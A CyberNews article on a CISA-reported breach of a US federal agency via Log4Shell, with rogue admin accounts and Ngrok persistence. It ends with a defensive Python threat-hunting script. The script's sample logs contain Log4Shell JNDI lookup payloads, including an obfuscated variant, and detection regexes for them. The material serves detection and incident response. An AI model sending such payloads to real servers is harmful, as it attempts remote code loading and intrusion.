© 2022 CyberNews - Latest tech news, product reviews, and analyses.


Iran-sponsored actor breached US federal agency


A threat actor penetrated an unnamed US agency by exploiting the Log4Shell vulnerability in an unpatched VMware Horizon server, the US cybersecurity agency CISA said.

CISA conducted an incident response engagement at a Federal Civilian Executive Branch (FCEB) organization this summer, suspecting advanced persistent threat (APT) activity.

The threat actor behind the attack exploited a known vulnerability in Log4j, a popular logging library.

The agency's VMware Horizon server was unpatched. After exploiting it, the threat actors installed crypto mining software, moved laterally to the domain server, compromised credentials, and implanted Ngrok reverse proxies to maintain persistence.

CISA and FBI assess that Iranian APT actors were behind the cyberattack but haven’t attributed it to a particular Iranian threat actor.

The threat actor was observed executing Mimikatz to harvest credentials and creating a rogue domain administrator account, which it then used to spread to several hosts within the network.

After logging in to those hosts, the threat actors disabled Windows Defender and then installed Ngrok executables and configuration files.

They also changed the password of the local administrator account as a fallback in case the rogue domain administrator account was detected.

“CISA and FBI encourage all organizations with affected VMware systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities.”
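As an added illustration of the threat hunting CISA and FBI recommend, the following Python script (example code written for this article, not anything published by CISA, the FBI, or CyberNews) runs a handful of detections that mirror the activity described above over constructed sample telemetry: Log4Shell-style `${jndi:` lookups in HTTP request fields, a newly created account being added to Domain Admins, a password reset on the local Administrator account, Windows Defender real-time protection being disabled, and execution of an ngrok binary. The Windows event IDs are the real ones (4720, 4728, 4724, Defender 5001, Sysmon 1); the normalised record shape, host names, account names, and IP addresses are assumptions made for the example.

```python
import re

# Constructed sample telemetry, not data from the incident described above.
# Each Windows event is a dict in a hypothetical normalised shape that a log
# pipeline might emit; the event IDs themselves are the real Windows ones.
SAMPLE_WEB_LOGS = [
    '10.0.0.5 - - "GET /portal/ HTTP/1.1" 200 "Mozilla/5.0"',
    '198.51.100.7 - - "GET /portal/ HTTP/1.1" 200 "${jndi:ldap://203.0.113.9:1389/a}"',
    '198.51.100.7 - - "GET /portal/ HTTP/1.1" 200 "${${lower:j}ndi:ldap://203.0.113.9/b}"',
]

SAMPLE_EVENTS = [
    # 4720: user account created from a service context on the Horizon server
    {"host": "HORIZON01", "source": "Security", "event_id": 4720,
     "target_user": "svc_backup2", "subject_user": "HORIZON01$"},
    # 4728: that new account added to Domain Admins (a security-enabled global group)
    {"host": "DC01", "source": "Security", "event_id": 4728,
     "target_group": "Domain Admins", "member": "svc_backup2"},
    # 4724: password reset attempted on the built-in local Administrator account
    {"host": "DC01", "source": "Security", "event_id": 4724,
     "target_user": "Administrator", "subject_user": "svc_backup2"},
    # Defender Operational log 5001: real-time protection disabled
    {"host": "DC01", "source": "Defender", "event_id": 5001,
     "subject_user": "svc_backup2"},
    # Sysmon 1: process creation of an ngrok binary from a world-writable path
    {"host": "DC01", "source": "Sysmon", "event_id": 1,
     "image": r"C:\Users\Public\ngrok.exe", "subject_user": "svc_backup2"},
    # Benign control: a helpdesk-created account that never joins Domain Admins
    {"host": "WS02", "source": "Security", "event_id": 4720,
     "target_user": "jdoe", "subject_user": "helpdesk"},
]

# Plain "${jndi:" lookup, plus nested "${${...}" lookups that attackers use to
# hide the literal "jndi" token from naive string matching.
JNDI_RE = re.compile(r"\$\{[^}]*jndi", re.IGNORECASE)
NESTED_LOOKUP_RE = re.compile(r"\$\{[^}]*\$\{")


def hunt_web_logs(lines):
    """Return (rule, line) pairs for requests carrying Log4j lookup strings."""
    findings = []
    for line in lines:
        if JNDI_RE.search(line) or NESTED_LOOKUP_RE.search(line):
            findings.append(("log4shell_lookup", line))
    return findings


def hunt_windows_events(events):
    """Return (rule, detail) pairs for the post-exploitation behaviours."""
    findings = []
    # Accounts created during the window, so a later group add can be tied to them.
    created = {e["target_user"] for e in events
               if e["source"] == "Security" and e["event_id"] == 4720}
    for e in events:
        src, eid = e["source"], e["event_id"]
        if (src == "Security" and eid == 4728
                and e.get("target_group") == "Domain Admins"
                and e.get("member") in created):
            findings.append(("new_account_made_domain_admin", e["member"]))
        elif (src == "Security" and eid == 4724
                and e.get("target_user", "").lower() == "administrator"):
            findings.append(("local_admin_password_reset",
                             f'{e["subject_user"]}@{e["host"]}'))
        elif src == "Defender" and eid == 5001:
            findings.append(("defender_realtime_disabled", e["host"]))
        elif src == "Sysmon" and eid == 1 and "ngrok" in e.get("image", "").lower():
            findings.append(("ngrok_execution", e["image"]))
    return findings


def hunt_all(web_lines, events):
    """Run both hunts and group the results by data source."""
    return {"web": hunt_web_logs(web_lines),
            "windows": hunt_windows_events(events)}


if __name__ == "__main__":
    for source, hits in hunt_all(SAMPLE_WEB_LOGS, SAMPLE_EVENTS).items():
        for rule, detail in hits:
            print(f"[{source}] {rule}: {detail}")
```

Running the script prints two web hits (the plain and the obfuscated lookup; the benign request is not flagged) and four Windows hits, while the helpdesk-created account that never joined Domain Admins stays quiet. This is first-pass triage only: a real hunt would pull from the actual Security, Defender Operational, and Sysmon logs across every host that could reach the Horizon server, and the lookup regex should be extended as new obfuscation forms are observed.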
